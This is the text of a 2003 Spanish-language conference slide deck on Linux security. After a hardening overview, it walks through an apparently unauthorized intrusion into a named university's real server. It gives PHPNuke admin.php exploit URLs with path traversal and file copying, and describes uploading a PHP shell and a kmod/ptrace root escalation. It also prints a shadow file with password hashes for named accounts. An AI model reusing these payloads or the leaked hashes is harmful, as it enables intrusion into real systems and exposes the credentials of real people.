tics en la vida cotidiana prepa en linea modulo 1.pptx
Presentacion re y_des_09072003
1. SEGURIDAD Y
HACKING
EN LINUX
Alonso Eduardo Caballero Quezada - ReYDeS -
RareGaZz Security Team http://www.RareGaZz.org
Security Wari Projetcs http://www.SWP-zone.org
informatizate http://www.informatizate.net
Miércoles 9 de Julio del 2003
2. SEGURIDAD Y HACKING EN LINUX / Alonso Caballero / INFOTECH I
1. Seguridad
2. Seguridad en GNU/Linux
3. Hacking en Linux. (U.N.T)
3. SEGURIDAD Y HACKING EN LINUX / Alonso Caballero / INFOTECH I
1. Seguridad en GNU/Linux
Seguridad:
Seguridad es la característica de un
sistema informático, que indica que
ese sistema está libre de todo
peligro.
“La seguridad es un estado mental”
4. SEGURIDAD Y HACKING EN LINUX / Alonso Caballero / INFOTECH I
Que proteger?
. SoftWare
. HardWare
. Datos
5. SEGURIDAD Y HACKING EN LINUX / Alonso Caballero / INFOTECH I
De quien nos protegemos?
- Personas:
. Personal de la empresa
. Ex-empleados
. Curiosos
. Hackers
. Crackers
. Terroristas (*)
. Intrusos Remunerados
- Desastres Naturales:
6. SEGURIDAD Y HACKING EN LINUX / Alonso Caballero / INFOTECH I
- Amenazas Logicas:
. Software incorrecto
. Herramientas de seguridad
. Puertas traseras (Backdoor)
. Bombas Logicas
. Canales cubiertos
. Virus
. Gusanos
. Caballos de Troya
7. SEGURIDAD Y HACKING EN LINUX / Alonso Caballero / INFOTECH I
SEGURIDAD EN LINUX
8. SEGURIDAD Y HACKING EN LINUX / Alonso Caballero / INFOTECH I
1. Definición de los
servicios necesarios.
. Servidor Web (Apache)
. Servidor de Correo
(Sendmail)
. Servidor SSH, FTP, DNS
etc.
9. SEGURIDAD Y HACKING EN LINUX / Alonso Caballero / INFOTECH I
2. Utilizar Herramientas
de Bastionado.
(BASTILLE ó TITAN)
. Educa al administrador
sobre potenciales problemas
de seguridad en el sistema.
10. SEGURIDAD Y HACKING EN LINUX / Alonso Caballero / INFOTECH I
3. Utilizar un Antivirus
basado en Software Libre.
(AmaViS)
. Indicado cuando hay
interacción entre Linux u
otro sistema Operativo.
11. SEGURIDAD Y HACKING EN LINUX / Alonso Caballero / INFOTECH I
4. Utilización de un PROXY
(SQUID).
. Un punto de acceso entre
una intranet y una
internet.
. Control de los datos.
(squidGuard)
12. SEGURIDAD Y HACKING EN LINUX / Alonso Caballero / INFOTECH I
5. Instalación y configuración
de un Firewall.
(IPTABLES).
. Un punto estratégico de
vigilancia del sistema.
. Creación de reglas para las
conecciones y servicios.
13. SEGURIDAD Y HACKING EN LINUX / Alonso Caballero / INFOTECH I
6. Detección de Instrusos
basados en HOST.
(Tripwire)
. Comprobar la integridad
de los archivos en el
sistema.
14. SEGURIDAD Y HACKING EN LINUX / Alonso Caballero / INFOTECH I
7. Sistema Detector de Intrusos
(IDS)
. Vigilancia del Servidor.
. Detección de actividad
sospechosa.
. Respuesta mediata e inmediata
. Uso de (ACID) Consola de D.I
15. SEGURIDAD Y HACKING EN LINUX / Alonso Caballero / INFOTECH I
8. Administrador
. Persona adecuada.
. Experiencia. (*)
. Actualización constante.
16. SEGURIDAD Y HACKING EN LINUX / Alonso Caballero / INFOTECH I
HACKING EN LINUX
17. SEGURIDAD Y HACKING EN LINUX / Alonso Caballero / INFOTECH I
ADVERTENCIA:
El artículo completo y detallado de lo expuesto
a continuación sera publicado en la eZine
RareGaZz Número 20. http://www.RareGaZz.org
Todo esta información se expone solo con fines
didacticos y de conocimiento. De ninguna
manera el autor o el Grupo RareGaZz induce a
realizar este tipo de acciones.
ReYDeS / RareGaZz Security Team
18. SEGURIDAD Y HACKING EN LINUX / Alonso Caballero / INFOTECH I
Institución:
Universidad Nacional de Trujillo
URL:
http://www.unitru.edu.pe
Tiempo Total:
2 horas.
Objetivo:
Auditoria Personal y Libre de la Seguridad del
servidor de la Universidad Nacional de Trujillo
19. SEGURIDAD Y HACKING EN LINUX / Alonso Caballero / INFOTECH I
Primer Punto:
Obtener todo la informacion posible del
sistema.
- Tools
. NMAP (www.insecure.org/nmap)
. NIKTO (http://www.cirt.net/code/nikto.shtml)
. NetCat
. Comandos propios de Linux, desde un simple
ping a un dig por ejemplo.
- Software De Auditoria:
. NESSUS (http://www.nessus.org)
23. SEGURIDAD Y HACKING EN LINUX / Alonso Caballero / INFOTECH I
Sistemas Vulnerables: PHPNuke 5.2 y anteriores
Sistemas Inmunes: PHPNuke 5.0 RC1
Exploit:
Probando el formato de la siguiente URL:
http://www.example.net/admin.php?upload=1 &file=config.php&
file_name=hacked.txt&wdir=/images/&userfile=config.php &
userfile_name=hacked.txt
Mediante la anterior peticion de la anterior URL se podría
observer leer en “config.php”. El cual contiene las claves de la
Base de Datos. Con todas las posibles consecuencias que ello
acarrea.
24. SEGURIDAD Y HACKING EN LINUX / Alonso Caballero / INFOTECH I
PHP NUKE EXPLOIT
25. SEGURIDAD Y HACKING EN LINUX / Alonso Caballero / INFOTECH I
Lo anterior, permite automatizar el test sobre
la falla en “admin.php”
La URL que se analiza es la siguiente:
http://www.unitru.edu.pe/admin.php?upload=1
&file=config.php&file_name=hacked.txt&wdir=/images/
&userfile=config.php&userfile_name=hacked.txt
Con esto se copia “hacked.txt” al directorio
“images”. Pero nos lleva al menu administración
con el siguiente error:
Warning: Unable to create '/www/htdocs/images/hacked.txt’
: Permission denied in /www/htdocs/admin.php on line 400
28. SEGURIDAD Y HACKING EN LINUX / Alonso Caballero / INFOTECH I
Ahora la siguiente URL, nos permite listar
cualquier directorio de la web. En éste caso
“/images/admin/”
http://www.unitru.edu.pe/admin.php?upload=1
&wdir=/images/admin/
Solo directorios de la WEB?... NO!
http://200.60.44.6/admin.php?upload=1&wdir=/../../../
La Raiz del sistema (Formato texto)
bin bin 4k 22-03-2001 18:56:22
boot boot 1k 23-03-2001 07:20:08
etc etc 4k 12-03-2003 09:04:18
root root 4k 22-02-2003 10:25:13
...
29. SEGURIDAD Y HACKING EN LINUX / Alonso Caballero / INFOTECH I
Se puede listar cualquier directorio y ver
archivos, pero solo con permisos de nobody.
Que se necesita para elevar privilegios?.
. Acceso de escritura a un directorio.
. Copiar el config.php. Archivo de la
configuración del phpnuke.
. Obtener mas información del sistema. Pero
ahora desde dentro, por ejemplo Software
instalado, versiones, actualizaciones,
conecciones, etc.
30. SEGURIDAD Y HACKING EN LINUX / Alonso Caballero / INFOTECH I
. Problema: Tenemos el directorio /tmp/ para
escritura, pero no podemos visualizar el
archivo. Ya que estamos trabajando vía web.
. Solución: Encontramos el programa YaBB
http://aries.unitru.edu.pe/foro/install.php
. Se tiene derechos de escritura en /foro/ y
podemos visualizarlo vía web. Con lo cual:
http://200.60.44.6/admin.php?upload=1&file=config.php
&file_name=p.txt&wdir=/foro/&userfile=config.php
&userfile_name=p.txt
[DIR] Parent Directory 24-Feb-2003 23:47 -
[ ] install.php 18-Feb-2003 03:08 18k
[TXT] p.txt 18-Mar-2003 01:11 11k
[ ] yse150.ya 18-Feb-2003 03:09 1.8M
31. SEGURIDAD Y HACKING EN LINUX / Alonso Caballero / INFOTECH I
PHP Nuke xploit: Permite subir archivos al
sistema.
32. SEGURIDAD Y HACKING EN LINUX / Alonso Caballero / INFOTECH I
Con la ayuda de PHP-Nuke exploit para subir
archivos y el PHP Shell para ejecutar comandos
ya se tiene un mejor control sobte el sistema.
33. SEGURIDAD Y HACKING EN LINUX / Alonso Caballero / INFOTECH I
. En /foro/:
. Subir cmd.html, rs.php Y en nuestro localhost
utilizamos el phpnuker.html.
Problema: Obtener privilegios ROOT.
Solución: Ejecutar un exploit para “explotar”
una falla en el sistema. Por ejemplo. Versión
del Kernel?
uname -a
Linux aries 2.4.2 #2 Fri Mar 23 06:53:47 PET 2001 i686
unknown
34. SEGURIDAD Y HACKING EN LINUX / Alonso Caballero / INFOTECH I
Linux kmod/ptrace bug:
Cuando un proceso hace una petición a una
caracteristica que esta en un modulo. En kernel
crea un proceso hijo setea los permisos EUID
GUID a 0 y llama a la funcion execve
(“/sbin/mdprobe”)
El problema es que antes de que el EUID cambie
el proceso hijo puede ser añadido con ptrace. De
ésta manera el usuario puede insertar codigo
dentro del proceso lo cual se ejecutará con
privilegios de superusuario (ROOT).
Ejemplo: ->
35. SEGURIDAD Y HACKING EN LINUX / Alonso Caballero / INFOTECH I
root:$1$1j/xKdpw$KMm/nMEBb3tZkpj42oiL9/:11913:0:::::
bin:*:9797:0:::::
daemon:*:9797:0:::::
adm:*:9797:0:::::
lp:*:9797:0:::::
sync:*:9797:0:::::
shutdown:*:9797:0:::::
halt:*:9797:0:::::
mail:*:9797:0:::::
news:*:9797:0:::::
uucp:*:9797:0:::::
operator:*:9797:0:::::
games:*:9797:0:::::
ftp:*:9797:0:::::
gdm:*:9797:0:::::
nobody:*:9797:0:::::
dwong:$1$3NZyPSF2$2VO7nReTKGN5Y9PftBX1j/:12122:0:99999:7:::
mysql:$1$2DIuivNW$5/35UzOTWcOdaPvqRFcuX.:11404:0:99999:7:::
webmaster:$1$qcRvrUzR$U9Y5LepV0STQewAdD6FkA/:11624:0:99999:7:::
toor:$1$12/Juu6R$riwwt6ZQcX4fKyynY3eZq1:11438:0:99999:7:::
jchong:$1$DE/x6fuY$OWWC0qFyQMm7d9XdbG5f1/:11871:0:99999:7:::
kayluss:$1$dWpxKneU$plRq15DL8/qtO9Z8414yW0:11914:0:99999:7:::
eponte:$1$0hXuyKVe$Qxbdcg/erYBLpPkHNodC0.:12107:0:99999:7:::
36. SEGURIDAD Y HACKING EN LINUX / Alonso Caballero / INFOTECH I
Gracias por su atención
[root@camaratru root]# shutdown -r now
e-mail: ReYDeS@bigfoot.com
37. SEGURIDAD Y HACKING EN LINUX / Alonso Caballero / INFOTECH I
Agradecimientos:
Mi Madre, mi hermana, mi sobrino y Padre.
Angel Protector, alt3kx, Buanzo, PaTa, ocsic, Shadown,
enan0, v1k1ng0, MaGics, Yo_soy, runl3v3l, xDAWN, Rebel,
Neoy2k, RareTrip, GuyBrush, y0ni, y a todos los que
alguna vez participaron en RareGaZz Security Team.
A sicario, incompatible, xyz4a3, Sudmaster, y a
todo los amigos de Security Wari Projects.
A todos mis amigos virtuales del “Underground”.
A Miguel, David, Deus, Francisco, Victor, Robert y Juan
Manuel, del grupo informatizate.
A Arturo, Alejandro, Javier, Juan, miembros de ICIAT.
A todos mis amigos “reales”.
A Juditsa, Claudia, Paola, Betsy, Cecilia, Carol,
Miluska, Marilyn, Patricia, Silvana, Sara, Angela, Leily,
Maribel, Cynthia, Elizabeth, Milagros, Erika, Jhenice,
Nathaly, etc, etc. En especial a mi:
Futura Esposa.
(Donde quiera que este)
38. SEGURIDAD Y HACKING EN LINUX / Alonso Caballero / INFOTECH I
Problemas de identidad
* Me he olvidado el pasword....
* Me he olvidado mi login....
* ( variante de la anterior ) Es que no sé quien soy....
* Es que soy tonto, y necesito que me lo hagan....
* ¿Cuál es mi "dolarjome"?
Aspirantes a hacker
* ¿Qué tengo que hacer para entrar de root?
* ¿Cómo puedo saltarme el firewall?
* Oye, no me deja cambiar la configuración de las X...
* Es que quiero poner un sniffer, y necesito entrar de root...
* Qué hay que hacer en el firewall para que funcione la VozIP?